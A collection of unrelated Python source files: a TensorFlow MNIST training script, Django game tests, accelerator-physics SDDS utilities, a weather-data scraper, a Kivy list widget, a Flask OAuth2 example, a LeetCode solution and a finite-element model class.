tf.app.flags.DEFINE_integer('max_num_checkpoint', 10,
'Maximum number of checkpoints that TensorFlow will keep.')
tf.app.flags.DEFINE_integer('num_classes', 10,
'Number of model clones to deploy.')
tf.app.flags.DEFINE_integer('batch_size', np.power(2, 7),
'Number of model clones to deploy.')
tf.app.flags.DEFINE_integer('num_epochs', 5,
'Number of epochs for training.')
##########################################
######## Learning rate flags #############
##########################################
tf.app.flags.DEFINE_float('initial_learning_rate', 0.001, 'Initial learning rate.')
tf.app.flags.DEFINE_float(
'learning_rate_decay_factor', 0.95, 'Learning rate decay factor.')
tf.app.flags.DEFINE_float(
'num_epochs_per_decay', 1, 'Number of epoch pass to decay learning rate.')
#########################################
########## status flags #################
#########################################
tf.app.flags.DEFINE_boolean('is_training', False,
'Training/Testing.')
tf.app.flags.DEFINE_boolean('fine_tuning', False,
'Fine tuning is desired or not?.')
tf.app.flags.DEFINE_boolean('online_test', True,
'Fine tuning is desired or not?.')
tf.app.flags.DEFINE_boolean('allow_soft_placement', True,
'Automatically put the variables on CPU if there is no GPU support.')
tf.app.flags.DEFINE_boolean('log_device_placement', False,
'Demonstrate which variables are on what device.')
# Store all elemnts in FLAG structure!
FLAGS = tf.app.flags.FLAGS
################################################
################# handling errors!##############
################################################
if not os.path.isabs(FLAGS.train_root):
raise ValueError('You must assign absolute path for --train_root')
if not os.path.isabs(FLAGS.checkpoint_root):
raise ValueError('You must assign absolute path for --checkpoint_root')
##########################################
####### Load and Organize Data ###########
##########################################
'''
In this part the input must be prepared.
1 - The MNIST data will be downloaded.
2 - The images and labels for both training and testing will be extracted.
3 - The prepared data format(?,784) is different by the appropriate image shape(?,28,28,1) which needs
to be fed to the CNN architecture. So it needs to be reshaped.
'''
# Download and get MNIST dataset(available in tensorflow.contrib.learn.python.learn.datasets.mnist)
# It checks and download MNIST if it's not already downloaded then extract it.
# The 'reshape' is True by default to extract feature vectors but we set it to false to we get the original images.
mnist = input_data.read_data_sets("MNIST_data/", reshape=True, one_hot=True)
train_data = mnist.train.images
train_label = mnist.train.labels
test_data = mnist.test.images
test_label = mnist.test.labels
# # The 'input.provide_data' is provided to organize any custom dataset which has specific characteristics.
# data = input.provide_data(mnist)
# Dimentionality of train
dimensionality_train = train_data.shape
# Dimensions
num_train_samples = dimensionality_train[0]
num_features = dimensionality_train[1]
#######################################
########## Defining Graph ############
#######################################
graph = tf.Graph()
with graph.as_default():
###################################
########### Parameters ############
###################################
# global step
global_step = tf.Variable(0, name="global_step", trainable=False)
# learning rate policy
decay_steps = int(num_train_samples / FLAGS.batch_size *
FLAGS.num_epochs_per_decay)
learning_rate = tf.train.exponential_decay(FLAGS.initial_learning_rate,
global_step,
decay_steps,
FLAGS.learning_rate_decay_factor,
staircase=True,
name='exponential_decay_learning_rate')
###############################################
########### Defining place holders ############
###############################################
image_place = tf.placeholder(tf.float32, shape=([None, num_features]), name='image')
label_place = tf.placeholder(tf.float32, shape=([None, FLAGS.num_classes]), name='gt')
dropout_param = tf.placeholder(tf.float32)
##################################################
########### Model + Loss + Accuracy ##############
##################################################
# MODEL(MPL with two hidden layer)
# LAYER-1
net = tf.contrib.layers.fully_connected(inputs=image_place, num_outputs=250, scope='fc-1')
# LAYER-2
net = tf.contrib.layers.fully_connected(inputs=net, num_outputs=250, scope='fc-2')
# SOFTMAX
logits_pre_softmax = tf.contrib.layers.fully_connected(inputs=net, num_outputs=FLAGS.num_classes, scope='fc-3')
# Define loss
softmax_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(logits=logits_pre_softmax, labels=label_place))
# Accuracy
accuracy = tf.reduce_mean(
tf.cast(tf.equal(tf.argmax(logits_pre_softmax, 1), tf.argmax(label_place, 1)), tf.float32))
#############################################
########### training operation ##############
#############################################
# Define optimizer by its default values
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
# 'train_op' is a operation that is run for gradient update on parameters.
# Each execution of 'train_op' is a training step.
# By passing 'global_step' to the optimizer, each time that the 'train_op' is run, Tensorflow
# update the 'global_step' and increment it by one!
# gradient update.
with tf.name_scope('train_scope'):
grads = optimizer.compute_gradients(softmax_loss)
train_op = optimizer.apply_gradients(grads, global_step=global_step)
###############################################
############ Define Sammaries #################
###############################################
# Summaries for loss and accuracy
tf.summary.scalar("loss", softmax_loss, collections=['train', 'test'])
tf.summary.scalar("accuracy", accuracy, collections=['train', 'test'])
tf.summary.scalar("global_step", global_step, collections=['train'])
tf.summary.scalar("learning_rate", learning_rate, collections=['train'])
# Merge all summaries together.
summary_train_op = tf.summary.merge_all('train')
summary_test_op = tf.summary.merge_all('test')
############################################
############ Run the Session ###############
############################################
session_conf = tf.ConfigProto(
allow_soft_placement=FLAGS.allow_soft_placement,
log_device_placement=FLAGS.log_device_placement)
sess = tf.Session(graph=graph, config=session_conf)
with sess.as_default():
# Run the saver.
# 'max_to_keep' flag determines the maximum number of models that the tensorflow save and keep. default by TensorFlow = 5.
saver = tf.train.Saver(max_to_keep=FLAGS.max_num_checkpoint)
# Initialize all variables
sess.run(tf.global_variables_initializer())
###################################################
############ Training / Evaluation ###############
###################################################
# The prefix for checkpoint files
checkpoint_prefix = 'model'
###################################################################
########## Defining the summary writers for train/test ###########
###################################################################
train_summary_dir = os.path.join(FLAGS.train_root, "summaries", "train")
train_summary_writer = tf.summary.FileWriter(train_summary_dir)
train_summary_writer.add_graph(sess.graph)
test_summary_dir = os.path.join(FLAGS.train_root, "summaries", "test")
test_summary_writer = tf.summary.FileWriter(test_summary_dir)
test_summary_writer.add_graph(sess.graph)
# If fie-tuning flag in 'True' the model will be restored.
if FLAGS.fine_tuning:
saver.restore(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model restored for fine-tuning...")
###################################################################
########## Run the training and loop over the batches #############
###################################################################
for epoch in range(FLAGS.num_epochs):
total_batch_training = int(train_data.shape[0] / FLAGS.batch_size)
# go through the batches
for batch_num in range(total_batch_training):
#################################################
########## Get the training batches #############
#################################################
start_idx = batch_num * FLAGS.batch_size
end_idx = (batch_num + 1) * FLAGS.batch_size
# Fit training using batch data
train_batch_data, train_batch_label = train_data[start_idx:end_idx], train_label[
start_idx:end_idx]
########################################
########## Run the session #############
########################################
# Run optimization op (backprop) and Calculate batch loss and accuracy
# When the tensor tensors['global_step'] is evaluated, it will be incremented by one.
batch_loss, _, train_summaries, training_step = sess.run(
[softmax_loss, train_op,
summary_train_op,
global_step],
feed_dict={image_place: train_batch_data,
label_place: train_batch_label,
dropout_param: 0.5})
########################################
########## Write summaries #############
########################################
# Write the summaries
train_summary_writer.add_summary(train_summaries, global_step=training_step)
# # Write the specific summaries for training phase.
# train_summary_writer.add_summary(train_image_summary, global_step=training_step)
#################################################
########## Plot the progressive bar #############
#################################################
print("Epoch #" + str(epoch + 1) + ", Train Loss=" + \
"{:.3f}".format(batch_loss))
#####################################################
########## Evaluation on the test data #############
#####################################################
if FLAGS.online_test:
# WARNING: In this evaluation the whole test data is fed. In case the test data is huge this implementation
# may lead to memory error. In presense of large testing samples, batch evaluation on testing is
# recommended as in the training phase.
test_accuracy_epoch, test_summaries = sess.run(
[accuracy, summary_test_op],
feed_dict={image_place: test_data,
label_place: test_label,
dropout_param: 1.})
print("Test Accuracy= " + \
"{:.4f}".format(test_accuracy_epoch))
###########################################################
########## Write the summaries for test phase #############
###########################################################
# Returning the value of global_step if necessary
current_step = tf.train.global_step(sess, global_step)
# Add the couter of global step for proper scaling between train and test summuries.
test_summary_writer.add_summary(test_summaries, global_step=current_step)
###########################################################
############ Saving the model checkpoint ##################
###########################################################
# # The model will be saved when the training is done.
# Create the path for saving the checkpoints.
if not os.path.exists(FLAGS.checkpoint_root):
os.makedirs(FLAGS.checkpoint_root)
# save the model
save_path = saver.save(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model saved in file: %s" % save_path)
############################################################################
########## Run the session for pur evaluation on the test data #############
############################################################################
# The prefix for checkpoint files
checkpoint_prefix = 'model'
# Restoring the saved weights.
saver.restore(sess, os.path.join(FLAGS.checkpoint_root, checkpoint_prefix))
print("Model restored...")
# Evaluation of the model
total_test_accuracy = sess.run(accuracy, feed_dict={
image_place: test_data,
label_place: test_label,
dropout_param: 1.})
print("Final Test Accuracy is %.2f" % total_test_accuracy)
|
from datetime import timedelta
from django.test import TestCase
from django.utils import timezone
from app.models import Game, PlayerRole
from app.tests.helpers.tag_tester import TagTester
from app.tests.helpers.user_tester import UserTester
class TagTest(TestCase):
def setUp(self):
user_tester = UserTester()
self.game = Game.objects.get(name='Test Game')
self.tag_tester = TagTester()
self.human_user, self.human = user_tester.create_user_and_player('human@email.com', 'Human', 'Being')
_, zombie = user_tester.create_user_and_player('zombie@email.com', 'Zombie', 'Undead')
self.zombie = zombie.kill()
self.game.started_on = timezone.now()
self.game.save()
def test_no_tags(self):
self.assertEqual(self.zombie.value(timezone.now()), 5)
self.assertEqual(self.human.score(), 0)
def test_one_tag(self):
now = timezone.now()
self.tag_tester.tag(self.human, self.zombie, now - timedelta(seconds=1))
self.assertEqual(self.zombie.value(now - timedelta(hours=1)), 5)
self.assertEqual(self.zombie.value(now + timedelta(hours=1)), 4)
self.assertEqual(self.zombie.value(now), 4)
self.assertEqual(self.human.score(), 5)
def test_multiple_tags(self):
now = timezone.now()
for i in range(0, 3):
self.tag_tester.tag(self.human, self.zombie, now - timedelta(hours=3 - i))
self.assertEqual(self.zombie.value(now), 2)
self.assertEqual(self.human.score(), 5 + 4 + 3)
def test_six_tags(self):
now = timezone.now()
for i in range(0, 6):
self.tag_tester.tag(self.human, self.zombie, now - timedelta(hours=6 - i))
self.assertEqual(self.zombie.value(now), 0)
def test_expired_tag(self):
now = timezone.now()
too_long_ago = now - timedelta(hours=9)
self.tag_tester.tag(self.human, self.zombie, too_long_ago)
self.assertEqual(self.zombie.value(now), 5)
self.tag_tester.tag(self.human, self.zombie, now - timedelta(seconds=1))
self.assertEqual(self.zombie.value(now), 4)
def test_that_humans_turn_into_zombies(self):
self.tag_tester.tag(self.zombie, self.human, timezone.now())
self.assertEqual(self.human_user.participant(self.game).role, PlayerRole.ZOMBIE)
|
# -*- coding: utf-8 -*-
u"""SDDS utilities.
:copyright: Copyright (c) 2018 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkio
from pykern import pksubprocess
from pykern.pkdebug import pkdc, pkdexc, pkdlog, pkdp
from sirepo.template import elegant_common
import math
import re
import sdds
# elegant mux and muy are computed in sddsprocess below
_ELEGANT_TO_MADX_COLUMNS = [
['ElementName', 'NAME'],
['ElementType', 'TYPE'],
['s', 'S'],
['betax', 'BETX'],
['alphax', 'ALFX'],
['mux', 'MUX'],
['etax', 'DX'],
['etaxp', 'DPX'],
['betay', 'BETY'],
['alphay', 'ALFY'],
['muy', 'MUY'],
['etay', 'DY'],
['etayp', 'DPY'],
['ElementOccurence', 'COUNT'],
]
MADX_TWISS_COLUMS = map(lambda row: row[1], _ELEGANT_TO_MADX_COLUMNS)
_SDDS_INDEX = 0
def extract_sdds_column(filename, field, page_index):
return process_sdds_page(filename, page_index, _sdds_column, field)
def process_sdds_page(filename, page_index, callback, *args, **kwargs):
try:
if sdds.sddsdata.InitializeInput(_SDDS_INDEX, filename) != 1:
pkdlog('{}: cannot access'.format(filename))
# In normal execution, the file may not yet be available over NFS
err = _sdds_error('Output file is not yet available.')
else:
#TODO(robnagler) SDDS_GotoPage not in sddsdata, why?
for _ in xrange(page_index + 1):
if sdds.sddsdata.ReadPage(_SDDS_INDEX) <= 0:
#TODO(robnagler) is this an error?
break
try:
return callback(*args, **kwargs)
except SystemError as e:
pkdlog('{}: page not found in {}'.format(page_index, filename))
err = _sdds_error('Output page {} not found'.format(page_index) if page_index else 'No output was generated for this report.')
finally:
try:
sdds.sddsdata.Terminate(_SDDS_INDEX)
except Exception:
pass
return {
'err': err,
}
def twiss_to_madx(elegant_twiss_file, madx_twiss_file):
outfile = 'sdds_output.txt'
twiss_file = 'twiss-with-mu.sdds'
# convert elegant psix to mad-x MU, rad --> rad / 2pi
pksubprocess.check_call_with_signals([
'sddsprocess',
elegant_twiss_file,
'-define=column,mux,psix 2 pi * /',
'-define=column,muy,psiy 2 pi * /',
twiss_file,
], output=outfile, env=elegant_common.subprocess_env())
pksubprocess.check_call_with_signals([
'sdds2stream',
twiss_file,
'-columns={}'.format(','.join(map(lambda x: x[0], _ELEGANT_TO_MADX_COLUMNS))),
], output=outfile, env=elegant_common.subprocess_env())
lines = pkio.read_text(outfile).split('\n')
header = '* {}\n$ \n'.format(' '.join(map(lambda x: x[1], _ELEGANT_TO_MADX_COLUMNS)))
pkio.write_text(madx_twiss_file, header + '\n'.join(lines) + '\n')
def _safe_sdds_value(v):
if isinstance(v, float) and (math.isinf(v) or math.isnan(v)):
return 0
return v
def _sdds_column(field):
column_names = sdds.sddsdata.GetColumnNames(_SDDS_INDEX)
column_def = sdds.sddsdata.GetColumnDefinition(_SDDS_INDEX, field)
values = sdds.sddsdata.GetColumn(
_SDDS_INDEX,
column_names.index(field),
)
return {
'values': map(lambda v: _safe_sdds_value(v), values),
'column_names': column_names,
'column_def': column_def,
'err': None,
}
def _sdds_error(error_text='invalid data file'):
sdds.sddsdata.Terminate(_SDDS_INDEX)
return {
'error': error_text,
}
|
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from lib.batch_annotator import BatchAnnotator
def main(csv_filename):
batch_annotator = BatchAnnotator(linker="umls")
output_filename = csv_filename.replace(".csv", ".json")
batch_annotator.load_csv(csv_filename)
batch_annotator.annotate(output_file=output_filename)
print("Done annotating %s, output in %s" % (csv_filename, output_filename))
if __name__ == "__main__":
if len(sys.argv) < 2 or not sys.argv[1].endswith(".csv"):
print("Specify a CSV file (.csv) to process")
else:
main(sys.argv[1])
|
# -*- coding: utf-8 -*-
from google.appengine.api import urlfetch
from google.appengine.api import urlfetch_errors
from bs4 import BeautifulSoup
import models
URL = "http://www.metoffice.gov.uk/climate/uk/summaries/datasets#Yearorder"
recording_fields = ['Year', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP', 'OCT', 'NOV', 'DEC', 'WIN',
'SPR', 'SUM', 'AUT', 'ANN']
urlfetch.set_default_fetch_deadline(60)
def make_soup(url):
"""
returns a BeautifulSoup instance.
:param url: String, URL which you want to get.
:return: instance, of BeautifulSoup
"""
try:
content_html = urlfetch.fetch(url).content
except urlfetch_errors.InvalidURLError:
return
return BeautifulSoup(content_html, "lxml")
def get_and_save_readings(url, region, mode):
"""
Gets data from the txt table.
:param mode: Object, To which mode does the readings belong.
:param region: Object, To which the region does the readings belongs.
:param url: url link for the txt file.
:return: a bool
"""
data = []
try:
content_txt = urlfetch.fetch(url).content
except urlfetch_errors.InvalidURLError, urlfetch_errors.DownloadError:
return
# Splitting the text file into table and text
table = content_txt.split('ANN\n')[1]
lines = table.split('\n')
# Parsing of past years
for line in lines[:-2]:
read = []
reading_list = line.split()
for index, reading in enumerate(reading_list):
if index == 0:
value = int(reading)
elif reading == '---':
value = None
else:
value = float(reading)
read.append(value)
if len(read) == 18:
data.append(read)
else:
print "Some values are missing(in past year parsing).."
# Parsing current year
read = []
year = lines[-2][:4]
read.append(int(year))
months_data = lines[-2][4:84]
month_data_separated = [months_data[i:i + 7] for i in range(0, len(months_data), 7)]
for m_data in month_data_separated:
value = m_data.strip()
if value == '':
value = None
else:
value = float(value)
read.append(value)
seasons_data = lines[-2][91:]
seasons_data_separated = map(float, seasons_data.split())
if len(seasons_data_separated) != 5:
i = 5 - len(seasons_data_separated)
while i != 0:
seasons_data_separated.append(None)
i -= 1
read.extend(seasons_data_separated)
if len(read) == 18:
data.append(read)
else:
print "Some values are missing(in current year parsing).."
# Updating or creating the datastore entry for each year
for item in data:
dictionary = dict(zip(recording_fields, item))
obj, created = models.Readings.objects.update_or_create(Region=region, Mode=mode, Year=dictionary['Year'],
defaults=dictionary)
def get_updates():
"""
Update or create everything from live website parsing
:return: bool, updated or not
"""
soup = make_soup(URL)
try:
table = soup.findAll('table', class_='table')
# Parsing types of Modes of data
mode_dict = {}
th = table[1].find('tr')
for index, td in enumerate(th.findAll('th')[1:]):
m = td.get_text().strip()
# fix for 'Raindays' coulum
if u'≥' in m:
m = m.rsplit(' ', 1)[0].strip()
mode_dict[index] = m
# Parsing and saving table data
tr_all = table[1].findAll('tr')[1:]
if tr_all:
for tr in tr_all:
td_name = tr.find('td').get_text()
# print td_name
region, created = models.Region.objects.get_or_create(Name=td_name)
for index, td in enumerate(tr.findAll('td')[1:]):
link = td.find('a').get('href')
# Saving Modes and links into database tables
mode, created = models.Mode.objects.get_or_create(Name=mode_dict[index])
link_obj, link_created = models.Link.objects.update_or_create(Link=link, Region=region,
Mode=mode)
try:
get_and_save_readings(link, region, mode)
except urlfetch_errors.DeadlineExceededError:
# print link
pass
# print tr_all
return True
else:
# no result in table
print 'No result for this query. Please Try again..'
return False
except AttributeError:
# no table in the html page
print 'Invalid query. Please Try again..'
return False
|
import json
with open('sample.json', 'r') as file:
result = json.load(file)
print(result)
|
SERVER_MOVE = "102 MOVE"
SERVER_TURN_LEFT = "103 TURN LEFT"
SERVER_TURN_RIGHT = "104 TURN RIGHT"
SERVER_PICK_UP = "105 GET MESSAGE"
SERVER_LOGOUT = "106 LOGOUT"
SERVER_OK = "200 OK"
SERVER_LOGIN_FAILED = "300 LOGIN FAILED"
SERVER_SYNTAX_ERROR = "301 SYNTAX ERROR"
SERVER_LOGIC_ERROR = "302 LOGIC ERROR"
SERVER_KEY = 54621
CLIENT_KEY = 45328
TIMEOUT = 1
TIMEOUT_RECHARGING = 5
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
class InvalidMessage(Exception):
pass
def create_message(message):
if type(message) != str:
return (str(message) + "\a\b").encode("utf-8")
return (message + "\a\b").encode("utf-8")
def syntax_check(message, phase, last_action, sep):
print("Syntax check: ", message, sep="")
a_at_end = False
now_separated = False
if sep == "\a\b":
now_separated = True
if len(message) > 0 and message[len(message) - 1] == "\a":
a_at_end = True
offset = 1
else:
offset = 2
if phase == 0 and len(message) > 12 - offset:
raise InvalidMessage("Username too long")
elif phase == 1 and len(message) > 7 - offset and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
raise InvalidMessage("Client confirmation too long")
elif phase == 1 and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
if (a_at_end and not message[:-1].isnumeric()) or (not a_at_end and not message.isnumeric()):
raise InvalidMessage("Client confirmation not numeric")
elif (phase == 2 or phase == 3 or phase == 4) and len(message) > 12 - offset and last_action != SERVER_PICK_UP:
raise InvalidMessage("Client action too long")
elif (phase == 2 or phase == 3 or phase == 4) and last_action != SERVER_PICK_UP and message != "RECHARGING\a"[:len(message)] and message != "FULL POWER\a"[:len(message)]:
split = message.split(" ")
if len(split) > 3:
raise InvalidMessage("Invalid format of client ok response")
if len(split) == 1:
if split[0] != "OK" and split[0] != "O":
raise InvalidMessage("Wrong format of the client action")
if len(split) == 2:
if split[0] != "OK" or split[1][-1:] == "\a":
raise InvalidMessage("Wrong format of the client action")
if split[1] != "-" and split[1] != "":
x = None
try:
x = float(split[1])
except ValueError as e:
raise InvalidMessage("Wrong format of the client action")
if not x.is_integer():
raise InvalidMessage("Wrong format of the client action")
if len(split) == 3:
if split[0] != "OK" or split[1] == "-" or (split[2] == "-" and now_separated) or (len(split) > 1 and split[2][-2:] == "-\a" and now_separated):
raise InvalidMessage("Wrong format of the client action")
if split[2] != "" and split[2] != "-":
y = None
try:
if a_at_end:
y = float(split[2][:-1])
else:
y = float(split[2])
except ValueError as e:
raise InvalidMessage("Wrong format of the client action")
if not y.is_integer():
raise InvalidMessage("Wrong format of the client action")
elif last_action == SERVER_PICK_UP and len(message) > 100 - offset and message != "RECHARGING"[:len(message)] and message != "FULL POWER"[:len(message)]:
raise InvalidMessage("Message too long")
return message
def compute_hash(username):
char_sum = 0
for c in username:
char_sum += ord(c)
return (char_sum * 1000) % 65536
def get_direction(coords1, coords2):
x1, y1 = coords1
x2, y2 = coords2
if x1 == x2 and y1 != y2:
if y1 < y2:
return UP
else:
return DOWN
elif x1 != x2 and y1 == y2:
if x1 < x2:
return RIGHT
else:
return LEFT
else:
return 4
def get_next_move(position, direction):
x, y = position
if x > -2:
if direction == UP:
return SERVER_TURN_LEFT, position, LEFT
elif direction == DOWN:
return SERVER_TURN_RIGHT, position, LEFT
elif direction == RIGHT:
return SERVER_TURN_LEFT, position, UP
return SERVER_MOVE, (x-1, y), LEFT
elif x < -2:
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT
elif direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT
elif direction == LEFT:
return SERVER_TURN_RIGHT, position, UP
return SERVER_MOVE, (x+1, y), RIGHT
elif y > 2:
if direction == LEFT:
return SERVER_TURN_LEFT, position, DOWN
elif direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN
elif direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT
return SERVER_MOVE, (x, y-1), DOWN
elif y < 2:
if direction == LEFT:
return SERVER_TURN_RIGHT, position, UP
elif direction == RIGHT:
return SERVER_TURN_LEFT, position, UP
elif direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT
return SERVER_MOVE, (x, y+1), UP
def search_box(position, direction, picked):
if position == (-2, 2):
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT, False
elif direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN, False
elif direction == LEFT:
return SERVER_TURN_LEFT, position, DOWN, False
if not picked:
picked = True
return SERVER_PICK_UP, position, direction, picked
elif position == (2, -2):
return "Not found!"
else:
x, y = position
picked = False
if x % 2 == 0:
if y != -2:
if direction == RIGHT:
return SERVER_TURN_RIGHT, position, DOWN, picked
return SERVER_MOVE, (x, y-1), DOWN, picked
if y == -2:
if direction == DOWN:
return SERVER_TURN_LEFT, position, RIGHT, True
else:
return SERVER_MOVE, (x+1, y), RIGHT, picked
else:
if y != 2:
if direction == RIGHT:
return SERVER_TURN_LEFT, position, UP, picked
return SERVER_MOVE, (x, y+1), UP, picked
if y == 2:
if direction == UP:
return SERVER_TURN_RIGHT, position, RIGHT, True
else:
return SERVER_MOVE, (x+1, y), RIGHT, picked
# print("RECHARGING"[:20])
|
from kivy.clock import Clock
from kivy.properties import BooleanProperty, ObjectProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
class IndexedItem:
def __init__(self, index=None, item=None):
self.index = index
self.item = item
class ListView(BoxLayout):
selected_element = ObjectProperty(IndexedItem())
def __init__(self, items, render_item=None, item_height=25, **kwargs):
super().__init__(**kwargs)
self.orientation = 'vertical'
self._list_items = []
self._render_item = render_item
self._item_height = item_height
for item in items:
self.add_list_item(item)
def on_minimum_height(self, _, minimum_height):
self.height = minimum_height
def _create_list_item(self, index, item):
list_item = ListViewItem(index, item, self._render_item, self, height=self._item_height, size_hint_y=None)
list_item.bind(selected=self._on_list_item_selected)
return list_item
def _on_list_item_selected(self, instance, selected):
prev_index = self.selected_element.index
if selected:
self.selected_element = IndexedItem(instance.index, instance.item)
Clock.schedule_once(lambda _: self._rebuild_list_items(instance.index, prev_index), 0)
def _rebuild_list_items(self, index, prev_index):
if prev_index is not None:
self._list_items[prev_index].rebuild()
if index is not None:
self._list_items[index].rebuild()
def add_list_item(self, item):
list_item = self._create_list_item(len(self._list_items), item)
self._list_items.append(list_item)
self.add_widget(list_item)
def clear_list_items(self):
self._list_items = []
self.clear_widgets()
self.selected_element = IndexedItem()
def select_item(self, index):
if self.selected_element.index is not None:
previously_selected = self._list_items[self.selected_element.index]
previously_selected.selected = False
if len(self._list_items) > 0:
self._list_items[index].selected = True
class ListViewItem(BoxLayout):
selected = BooleanProperty(False)
def __init__(self, index, item, render_function, parent, **kwargs):
super().__init__(**kwargs)
self.item = item
self.index = index
self._render = render_function
self.add_widget(self._build_item(parent))
def _build_item(self, parent):
if self._render is None:
return Label(text=self.item, halign='left', valign='middle', text_size=(parent.width, None))
else:
return self._render(self.index, self.item, parent)
def rebuild(self):
self.clear_widgets()
self.add_widget(self._build_item(self.parent))
def on_touch_down(self, touch):
if self.parent.collide_point(*touch.pos):
if self.collide_point(*touch.pos):
self.selected = True
else:
self.selected = False
|
import flask
import flask_oauthres
from . import config
app = flask.Flask(__name__)
app.config.from_mapping(
SECRET_KEY=config.SECRET_KEY,
TESTING=config.TESTING,
DEBUG=config.DEBUG
)
oauth = flask_oauthres.OAuth2Resource(app=app,
resource_id=config.OAUTH2_RESOURCE_ID,
client_id=config.OAUTH2_CLIENT_ID,
client_secret=config.OAUTH2_CLIENT_SECRET,
check_token_endpoint_url=config.OAUTH2_CHECK_TOKEN_ENDPOINT_URL)
@app.route('/')
def index():
return "OK"
@app.route('/secured_with_scope')
@oauth.has_scope('scope_xyz')
def endpoint_secured_by_token_with_scope():
return "OK"
@app.route('/secured_with_any_of_role')
@oauth.has_any_role('role_abc', 'role_xyz')
def endpoint_secured_by_token_with_any_of_role():
return "OK"
@app.route('/secured_with_all_require_roles')
@oauth.has_all_roles('role_abc', 'role_xyz')
def endpoint_secured_by_token_with_all_roles():
return "OK"
|
from typings import *
class Event(object):
def __init__(self, start_date: int, end_time: int, event_type: str, room: str, color="cyan", **args):
self.start_date = start_date
self.end_time = end_time
self.event_type = event_type
self.room = room
self.color = color
# Handle rest args for specific event
def parse_event(s:str):
pass
#TODO Handle parsing event into event.
|
"""
Given a word, you need to judge whether the usage of capitals in it is right or not.
We define the usage of capitals in a word to be right when one of the following cases holds:
All letters in this word are capitals, like "USA".
All letters in this word are not capitals, like "leetcode".
Only the first letter in this word is capital, like "Google".
Otherwise, we define that this word doesn't use capitals in a right way.
Example 1:
Input: "USA"
Output: True
Example 2:
Input: "FlaG"
Output: False
Note: The input will be a non-empty word consisting of uppercase and lowercase latin letters.
"""
class Solution:
def detectCapitalUse(self, word): # 32ms
return word.islower() or word.isupper() or word.istitle()
def detectCapitalUse2(self, word): # 24ms
if word[0].islower():
return word.islower()
elif len(word) < 3:
return True
elif word[1].isupper():
return word[2:].isupper()
else:
return word[2:].islower()
|
"""
Definitions of classes that define the imported model
"""
import numpy as np
from pyvista import UnstructuredGrid
from .step import Step
from .faces import RigidSurface, DeformableSurface, Face
from .elements import N_INT_PNTS
class Model:
"""Class for the model.
This contains all the information of the model.
Attributes
----------
nodes : dict
elements : dict
element_sets : dict
node_sets : dict
surfaces : dict
"""
def __init__(self):
self.nodes: dict = dict()
self.elements: dict = dict()
self.element_sets: dict = dict()
self.node_sets: dict = dict()
self.surfaces: dict = dict()
self.results: dict = dict()
self.metadata: dict = dict()
self.mesh = None
self.elem_output: dict = dict()
self.nodal_output: dict = dict()
self.steps: dict = dict()
self._curr_out_step: int = None
self._curr_incr: int = None
self._dimension: int = None
self._status: int = None
def set_status(self, n):
"""Set the SDV number controling the element deletion
Parameters
----------
n : TODO
Returns
-------
TODO
"""
self._status = n
def add_node(self, node):
self.nodes[node._num] = node
def add_element(self, element):
self.elements[element.num] = element
def add_set(self, name, elements, s_type):
"""Add an element set.
Parameters
----------
name : TODO
Returns
-------
TODO
"""
if s_type == "node":
self.node_sets[name] = elements
elif s_type == "element":
self.element_sets[name] = elements
def add_deformable_surface(self, name, dimension, master_surf):
"""Add a surface to the model.
Parameters
----------
name : TODO
faces : TODO
"""
if name not in self.surfaces:
self.surfaces[name] = DeformableSurface(name, dimension, self, master_surf)
def add_rigid_surface(self, name, dimension, ref_point):
"""Add a surface to the model.
Parameters
----------
name : TODO
faces : TODO
"""
if name not in self.surfaces:
self.surfaces[name] = RigidSurface(name, dimension, self, ref_point)
def add_face_to_surface(self, surface, face_info):
"""Add a face to an existing surface
Parameters
----------
surface : str
Label of the surface to add the facelt to.
face_info : dict
Dictionary with the data to create a Face object.
"""
elem_n = face_info["element"]
if elem_n == 0:
element = None
else:
element = self.elements[elem_n]
face = Face(element, face_info["face"], face_info["nodes"])
self.surfaces[surface].add_face(face)
def add_elem_output(self, elem, var, data, step, inc, intpnt):
"""Add element output data
Parameters
----------
var : TODO
data : TODO
intpnt : int
Integration point number if the results contain integration point data.
TODO: handle elements with different outputs.
Returns
-------
TODO
"""
if var not in self.elem_output[step][inc]:
self.elem_output[step][inc][var] = dict()
if elem not in self.elem_output[step][inc][var]:
etype = self.elements[elem].elem_code
self.elem_output[step][inc][var][elem] = np.empty((N_INT_PNTS[etype], 1), dtype=np.float64)
self.elem_output[step][inc][var][elem][intpnt - 1] = data
def add_nodal_output(self, node, var, data, step, inc):
"""Add nodal output results
Parameters
----------
node : int
Node to which assign the data
var : str
Name of the variable
data : float
Value of the output
"""
curr_step = self._curr_out_step
curr_inc = self._curr_incr
if var not in self.nodal_output[curr_step][curr_inc]:
self.nodal_output[curr_step][curr_inc][var] = dict()
self.nodal_output[step][inc][var][node] = data
def add_step(self, n, data):
"""Add a new step to the output database
Parameters
----------
n : int
Index of the step
data : list
Arguments for the Step object
Returns
-------
TODO
"""
# Add step to model
if n not in self.steps:
self.steps[n] = Step(self, n, data)
inc_n = data["increment number"]
self._curr_out_step = n
self._curr_incr = inc_n
# Initialize output repository for the current increment in step
self.nodal_output[n] = {inc_n: dict()}
self.elem_output[n] = {inc_n: dict()}
# Add increment to step
else:
step_time = data["step time"]
load_prop = data["load proportionality"]
time_inc = data["time increment"]
inc_n = data["increment number"]
# Initialize output repository for the current increment in step
self.nodal_output[n][inc_n] = dict()
self.elem_output[n][inc_n] = dict()
self._curr_out_step = data["step number"]
self._curr_incr = data["increment number"]
